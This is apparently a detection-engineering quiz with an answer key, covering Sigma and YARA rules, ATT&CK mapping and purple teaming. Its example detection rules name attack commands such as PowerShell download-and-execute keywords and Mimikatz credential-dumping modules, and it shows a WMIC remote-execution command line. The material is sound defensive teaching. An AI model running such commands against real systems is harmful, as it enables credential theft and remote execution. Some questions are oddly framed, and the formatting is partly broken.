Skip to content

Chapter 4: Detection Engineering - Quiz

← Back to Chapter 4


Instructions

Test your understanding of detection engineering, Sigma/YARA rules, purple teaming, ATT&CK mapping, and Detection-as-Code practices.


Question 1: What is the primary advantage of behavior-based detections over signature-based detections?

A) Behavior-based detections have zero false positives B) Behavior-based detections are harder to evade and detect technique variants C) Behavior-based detections are easier to write D) Behavior-based detections require no tuning

Answer

Correct Answer: B) Behavior-based detections are harder to evade and detect technique variants

Explanation: Behavior-based rules focus on how attackers act rather than specific artifacts:

Signature-based (IOC): - Detects specific file hash, domain, or IP - Evasion: Change one byte → new hash (trivial) - Lifespan: Short (attackers constantly rotate IOCs)

Behavior-based (TTP): - Detects malicious patterns (e.g., PowerShell download-and-execute) - Evasion: Requires changing fundamental attack technique - Lifespan: Durable across campaigns

Example:

# Behavior: PowerShell download & execute (detects technique, not specific malware)
detection:
  selection_download:
    Image|endswith: '\powershell.exe'
    CommandLine|contains: ['Invoke-WebRequest', 'DownloadString']
  selection_execute:
    CommandLine|contains: ['Invoke-Expression', 'IEX']
  condition: selection_download and selection_execute

Note: Behavior-based detections DO have false positives (legitimate admin scripts may match) and require tuning.

Reference: Chapter 4, Section 4.2 - Detection Types


Question 2: What does the Sigma rule format enable?

A) Automatic penetration testing B) Vendor-neutral detection rules that convert to multiple SIEM query languages (SPL, KQL, EQL) C) Real-time threat intelligence sharing D) Encrypted log storage

Answer

Correct Answer: B) Vendor-neutral detection rules that convert to multiple SIEM query languages

Explanation: Sigma is a universal detection format that solves the portability problem:

Problem: Each SIEM has its own query language: - Splunk → SPL - Microsoft Sentinel → KQL - Elastic → EQL/Lucene - IBM QRadar → AQL

Sigma Solution: Write rules once in YAML, convert to any SIEM.

Workflow:

1. Write Sigma rule (YAML)
2. Convert: sigmac -t splunk rule.yml → SPL query
3. Convert: sigmac -t kql rule.yml → KQL query
4. Deploy to respective SIEM

Benefits: - Portability: Change SIEM vendors without rewriting detections - Collaboration: Security community shares Sigma rules (SigmaHQ repository) - Version control: YAML rules in Git

Reference: Chapter 4, Section 4.3 - Sigma: Universal Detection Format


Question 3: In purple teaming, what is the role of the red team?

A) Monitor SIEM alerts and investigate incidents B) Safely simulate attack techniques to test detections C) Write detection rules and tune thresholds D) Manage SIEM infrastructure

Answer

Correct Answer: B) Safely simulate attack techniques to test detections

Explanation: Purple teaming combines offensive (red) and defensive (blue) collaboration:

Purple Team Workflow: 1. Plan: Red team selects ATT&CK technique to test (e.g., T1003.001 - LSASS dumping) 2. Execute: Red team safely simulates the technique in test environment 3. Detect: Blue team monitors SIEM/EDR for alerts 4. Evaluate: Did detection fire? How long to detect? Any false positives? 5. Improve: Tune rules based on results

Roles: - Red Team: Simulates attacks (offensive) - Blue Team: Monitors and validates detections (defensive) - Purple Team: Collaborative approach (not separate team, but methodology)

Testing Frameworks: - Atomic Red Team: Small, focused tests mapped to ATT&CK - Caldera: Automated adversary emulation

Reference: Chapter 4, Section 4.5 - Testing Detections: Purple Teaming


Question 4: Which metric measures the percentage of ATT&CK techniques that have at least one detection?

A) Mean Time to Detect (MTTD) B) False Positive Rate C) Technique Coverage D) Alert Volume

Answer

Correct Answer: C) Technique Coverage

Explanation:

Technique Coverage = (Techniques with Detections) / (Total Applicable Techniques) × 100%

Example: - Applicable techniques for environment: 150 - Techniques with active detections: 90 - Coverage = 60%

Measurement: - Map each detection rule to ATT&CK techniques - Use MITRE ATT&CK Navigator to visualize coverage (heatmaps) - Identify gaps (red = no detection)

Target: - >70% for critical tactics (Initial Access, Execution, Credential Access, Lateral Movement, Exfiltration) - 100% coverage is unrealistic (some techniques may not apply to your environment)

Gap Analysis: - Focus on high-impact techniques - Use threat intel: What are adversaries actively using? - Prioritize gaps in prevention controls (e.g., if no EDR on Linux servers, focus Linux detection rules)

Reference: Chapter 4, Section 4.4 - Detection Coverage Mapping


Question 5: What is a key benefit of storing detection rules in version control (Git)?

A) Automatically fixes false positives B) Tracks changes, enables rollback, and supports collaboration via pull requests C) Increases SIEM query performance D) Eliminates the need for testing

Answer

Correct Answer: B) Tracks changes, enables rollback, and supports collaboration via pull requests

Explanation: Detection-as-Code applies software development best practices to detection engineering:

Version Control Benefits: 1. Audit Trail: Who changed what, when, and why (commit history) 2. Rollback: Revert bad rules that cause FP spikes 3. Collaboration: Peer review via pull requests 4. Branching: Test new detections in dev branch before production 5. CI/CD: Automated validation and deployment

Example Git Workflow:

detection-rules/
├── sigma/
│   ├── process_creation/
│   │   ├── mimikatz_detection.yml
│   │   └── powershell_download_execute.yml
├── tests/
│   └── test_mimikatz_detection.py
└── README.md

CI Pipeline: - Validate Sigma syntax on commit - Convert to target SIEM format - Run unit tests against sample data - Auto-deploy to production if all checks pass

Reference: Chapter 4, Section 4.6 - Detection-as-Code


Question 6: A detection rule for PsExec lateral movement would map to which MITRE ATT&CK technique?

A) T1059.001 (PowerShell) B) T1021.002 (SMB/Windows Admin Shares) C) T1003.001 (LSASS Memory) D) T1566.001 (Phishing: Attachment)

Answer

Correct Answer: B) T1021.002 (Remote Services: SMB/Windows Admin Shares)

Explanation: PsExec is a common tool for lateral movement via SMB:

Detection Rule Example:

title: PsExec Lateral Movement
detection:
  selection:
    Image|endswith: '\PsExec.exe'
    CommandLine|contains: '\\'  # UNC path (e.g., \\remote-host)
  condition: selection

ATT&CK Mapping: - Technique: T1021.002 (Remote Services: SMB/Windows Admin Shares) - Tactic: Lateral Movement - Explanation: PsExec executes commands on remote systems using SMB and Windows Admin Shares

Other Techniques: - T1059.001: PowerShell execution - T1003.001: Credential dumping from LSASS - T1566.001: Phishing with malicious attachment

Reference: Chapter 4, Practice Tasks - Task 1


??? question "Question 7: What is a potential source of false positives for this detection rule? spl index=firewall action=allowed dest_port NOT IN (80, 443, 53) | stats count by src_ip, dest_ip, dest_port | where count < 5**

**A)** The rule is perfect and has no false positives
**B)** Legitimate applications using non-standard ports (VPNs, databases, SSH, RDP)
**C)** Too many true positives
**D)** Insufficient RGB lighting

??? success "Answer"
    **Correct Answer: B) Legitimate applications using non-standard ports (VPNs, databases, SSH, RDP)**

    **Explanation:** This rule flags unusual outbound connections (not HTTP/HTTPS/DNS), which can trigger on legitimate traffic:

    **False Positive Sources:**
    - **VPN connections:** Port 1194 (OpenVPN), 4500 (IPsec)
    - **Database connections:** Port 3306 (MySQL), 5432 (PostgreSQL), 1433 (MSSQL)
    - **Remote access:** Port 22 (SSH), 3389 (RDP)
    - **Internal services:** Custom application ports
    - **Cloud services:** Dynamic port ranges

    **Mitigation Strategies:**
    1. **Allowlist known applications:**
       ```spl
       ... | where NOT (dest_port IN (22, 3389, 3306, 1194))
       ```
    2. **Focus on unusual destinations:**
       ```spl
       ... | lookup known_services dest_ip OUTPUT is_known
          | where is_known=false
       ```
    3. **Add asset context:**
       ```spl
       ... | where asset_criticality="high"  # Only alert on critical systems
       ```
    4. **Behavioral baseline:**
       - Alert only on NEW port/destination combinations (not seen in past 30 days)

    **Reference:** [Chapter 4, Practice Tasks - Task 2](../chapters/ch04-siem-datalake-correlation.md)

Question 8: What is the Detection Pyramid, and what does it represent?

A) A hierarchical model showing detection durability (IOCs at top, TTPs at bottom) B) A hierarchical model showing detection durability (IOCs at top, analytics at base - inverted priority) C) A SIEM vendor ranking system D) A physical structure in SOC facilities

Answer

Correct Answer: B) A hierarchical model showing detection durability (IOCs at top, analytics at base)

Explanation: The Detection Pyramid visualizes detection strategy layers:

[Tactical] IOC-based (IP, hash, domain) /\ / \ / Behavioral \ (Technique-based) / \ / Analytical \ (Anomaly, ML) /____________________\

Layers: - Top (Tactical): IOC-based detections - Fast to deploy (add hash to blocklist) - Easy to evade (change one byte) - Short lifespan - Middle (Behavioral): Technique-based (TTPs) - Harder to evade (requires changing attack method) - More durable across campaigns - Base (Analytical): Anomaly and pattern-based (ML, UEBA) - Most robust (detects novel attacks) - Highest effort to develop - Adapts to environment

Best Practice: Build detections at ALL levels for defense in depth.

Reference: Chapter 4, Section 4.1 - Detection Pyramid


Question 9: A YARA rule is designed to detect what?

A) Network traffic patterns exclusively B) Patterns in files or memory (e.g., malware strings, byte sequences) C) User authentication failures D) Cloud configuration drift

Answer

Correct Answer: B) Patterns in files or memory (e.g., malware strings, byte sequences)

Explanation: YARA is a pattern-matching language for identifying malicious files and memory artifacts:

Use Cases: - File scanning (malware analysis, threat hunting) - Memory scanning (EDR, forensics) - Sandbox analysis (automated malware triage)

Example YARA Rule: yara rule Ransomware_Generic_Strings { meta: description = "Generic ransomware string patterns" author = "SOC Detection Team" strings: $s1 = "Your files have been encrypted" ascii wide $s2 = "bitcoin wallet" nocase $s3 = ".onion" ascii $s4 = "decrypt" fullword nocase condition: 3 of ($s*) # File must contain 3+ ransomware strings }

Detection Logic: - Define suspicious strings (keywords, APIs, byte patterns) - Specify conditions (must match X of Y patterns) - Scan files/memory with YARA engine

Integration: - EDR platforms use YARA for behavioral detections - Sandboxes run YARA rules on submitted files - Threat hunters use YARA for retrospective file scans

Reference: Chapter 4, Section 4.3 - YARA: File and Memory Scanning


Question 10: In the detection lifecycle, what comes AFTER development and BEFORE deployment?

A) Retirement B) Threat research C) Testing (purple team validation) D) Tuning

Answer

Correct Answer: C) Testing (purple team validation)

Explanation: The Detection Lifecycle follows a structured process:

[Threat Research] → [Rule Design] → [Development] → [Testing] → [Deployment] → [Tuning] → [Retirement] ↑ | └──────────────────────────────┘

Testing Phase (BEFORE Deployment): - Validate detection fires on known attack samples - Purple team exercises (simulate technique, check if alert fires) - Test for false positives (run against benign data) - Measure performance (query speed, resource usage) - Document test results

Why Testing Matters: - Untested rules may fail silently in production - False positive testing prevents alert fatigue - Performance testing prevents SIEM overload

Tools: - Atomic Red Team: Simulated attack tests - Caldera: Automated adversary emulation - Sample data sets: Benign user activity for FP testing

Reference: Chapter 4, Section 4.1 - The Detection Lifecycle


Question 11: What is anomaly-based detection, and what is a key limitation?

A) Detects known malware hashes; limitation is it only works on Windows B) Detects outliers from baseline behavior; limitation is it requires a training period and can be evaded by gradual changes C) Detects only network traffic; limitation is it cannot see endpoints D) Detects specific IP addresses; limitation is IPs change frequently

Answer

Correct Answer: B) Detects outliers from baseline behavior; limitation is it requires a training period and can be evaded by gradual changes

Explanation:

Anomaly-Based Detection: - Establishes baseline of normal behavior - Flags statistical outliers (activity exceeds baseline + X standard deviations)

Example: ```spl index=file_access | stats count by user, _time span=1h | eventstats avg(count) as avg_count, stdev(count) as stdev_count by user | eval threshold = avg_count + (3 * stdev_count) | where count > threshold

Alert: User accessed 3x more files than their baseline

```

Advantages: - Detects novel attacks without signatures - Adapts to environment - Good for insider threats and compromised accounts

Limitations: 1. Training Period Required: Needs 30-90 days to establish baseline 2. Slow Evasion: Attackers can gradually increase activity to stay within baseline 3. False Positives: Legitimate business changes (mergers, role changes) trigger alerts 4. Concept Drift: Baselines become stale as business evolves

Mitigation: - Combine with signature/behavioral detections - Regular baseline updates - Tune sensitivity thresholds

Reference: Chapter 4, Section 4.2 - 3. Anomaly-based Detection


Question 12: An Atomic Red Team test for T1003.001 (LSASS dumping) is executed, but no SIEM alert fires. What should the blue team do?

A) Assume the test failed and ignore it B) Investigate why the detection failed: verify telemetry exists, check detection logic, and improve the rule C) Immediately escalate to executives D) Delete all detections

Answer

Correct Answer: B) Investigate why the detection failed and improve the rule

Explanation: This is the purpose of purple teaming - identifying and closing detection gaps.

Investigation Steps: 1. Verify Telemetry: - Did the endpoint send logs to SIEM? - Check: index=endpoint host="test-system" earliest=-1h - If no logs: Fix log forwarding

  1. Check Detection Logic:
  2. Review detection rule query
  3. Is the rule looking for the right event types (process accessing LSASS, dump file creation)?
  4. Test query manually against known-good test data

  5. Validate Test Execution:

  6. Did Atomic Red Team actually execute the technique?
  7. Check test system locally for artifacts

  8. Improve Detection:

  9. Add additional detection methods (EDR behavioral, file creation monitoring)
  10. Expand telemetry coverage (enable Sysmon if not present)
  11. Document gap and remediation in test log

Test Documentation: Test ID: DET-2026-034 Technique: T1003.001 (LSASS Memory Dumping) Result: ❌ Detection did not fire Root Cause: SIEM rule only checked for "mimikatz.exe" in process name, but Atomic Test used "procdump.exe" Remediation: Updated rule to detect any process accessing LSASS memory (not just mimikatz) Retest: ✅ Detection now fires correctly

Reference: Chapter 4, Section 4.5 - Purple Teaming


Question 13: What is the purpose of the falsepositives field in a Sigma rule?

A) To automatically delete false positives B) To document known benign scenarios that may trigger the rule, helping analysts tune C) To disable the rule entirely D) To encrypt the rule

Answer

Correct Answer: B) To document known benign scenarios that may trigger the rule

Explanation: The falsepositives field provides critical context for analysts and detection engineers:

Example Sigma Rule: yaml title: Mimikatz Credential Dumping detection: selection_img: Image|endswith: '\mimikatz.exe' selection_cli: CommandLine|contains: ['sekurlsa::logonpasswords', 'lsadump::sam'] condition: selection_img or selection_cli falsepositives: - Legitimate penetration testing (whitelist known test systems) - Security training environments level: critical

Purpose: - For Analysts: Understand when to close as FP vs. escalate - For Engineers: Guidance on tuning (e.g., "add allowlist for IP 10.0.5.50") - For Documentation: Explain expected benign triggers

Best Practice: - Be specific: "Scheduled vulnerability scans from 10.0.1.100" (not just "scans") - Update as new FP sources discovered - Include remediation guidance where possible

Reference: Chapter 4, Section 4.3 - Sigma Rule Example


Question 14: Which statement about signature-based detections is TRUE?

A) They are completely obsolete and should never be used B) They provide high precision for known threats but are trivial to evade C) They detect all zero-day attacks D) They require machine learning

Answer

Correct Answer: B) They provide high precision for known threats but are trivial to evade

Explanation:

Signature-Based Detection: - Matches specific indicators (file hash, domain, IP, regex pattern)

Pros: - High precision: Known malware hash = definite detection - Fast performance: Simple lookups - Easy to understand: "Block this IP" is straightforward

Cons: - Trivial evasion: Change one byte → new hash (polymorphic malware) - Requires constant updates: New malware = new signatures needed - Misses zero-days: Unknown threats have no signatures

Modern Approach: - Use signatures as part of defense in depth (not the only layer) - Combine with behavioral and anomaly-based detections - Automate signature updates (threat intel feeds)

Example: spl index=endpoint file_hash="5d41402abc4b2a76b9719d911017c592" | table _time, host, file_path, process_name

Misconception Debunked: Signatures are NOT obsolete - they remain valuable for known threats. But relying ONLY on signatures is insufficient.

Reference: Chapter 4, Section 4.2 - 1. Signature-based Detection


??? question "Question 15: A detection engineer wants to detect attackers using wmic.exe for lateral movement. Which fields should the Sigma rule check?

yaml title: WMIC Lateral Movement detection: selection: Image|endswith: '\wmic.exe' CommandLine|contains: [???, ???]**

**A)** `'/node:'` and `'process call create'`
**B)** `'http://'` and `'https://'`
**C)** `'mimikatz'` and `'sekurlsa'`
**D)** `'GET'` and `'POST'`

??? success "Answer"
    **Correct Answer: A) `'/node:'` and `'process call create'`**

    **Explanation:** WMIC (Windows Management Instrumentation Command-line) is commonly abused for lateral movement:

    **Attack Pattern:**
    ```cmd
    wmic /node:REMOTE-PC process call create "cmd.exe /c malicious.exe"
    ```

    **Detection Logic:**
    - **`/node:`** → Targeting remote system
    - **`process call create`** → Executing command remotely

    **Complete Sigma Rule:**
    ```yaml
    title: WMIC Lateral Movement
    id: a1b2c3d4-e5f6-7890-1234-567890abcdef
    status: experimental
    description: Detects use of WMIC for remote command execution
    references:
      - https://attack.mitre.org/techniques/T1047/
    tags:
      - attack.execution
      - attack.lateral_movement
      - attack.t1047
    logsource:
      category: process_creation
      product: windows
    detection:
      selection:
        Image|endswith: '\wmic.exe'
        CommandLine|contains:
          - '/node:'
          - 'process call create'
      condition: selection
    falsepositives:
      - Legitimate remote administration (whitelist admin workstations)
      - Management tools using WMIC
    level: high
    ```

    **ATT&CK Mapping:** T1047 (Windows Management Instrumentation)

    **Reference:** [Chapter 4, Practice Tasks - Task 3](../chapters/ch04-siem-datalake-correlation.md)

Score Interpretation

  • 13-15 correct: Excellent! You're ready to build and test detection rules.
  • 10-12 correct: Good understanding. Practice writing Sigma/YARA rules hands-on.
  • 7-9 correct: Solid foundation. Focus on ATT&CK mapping and purple teaming concepts.
  • Below 7: Review Chapter 4, especially detection types and the detection lifecycle.

← Back to Chapter 4 | Next Quiz: Chapter 5 →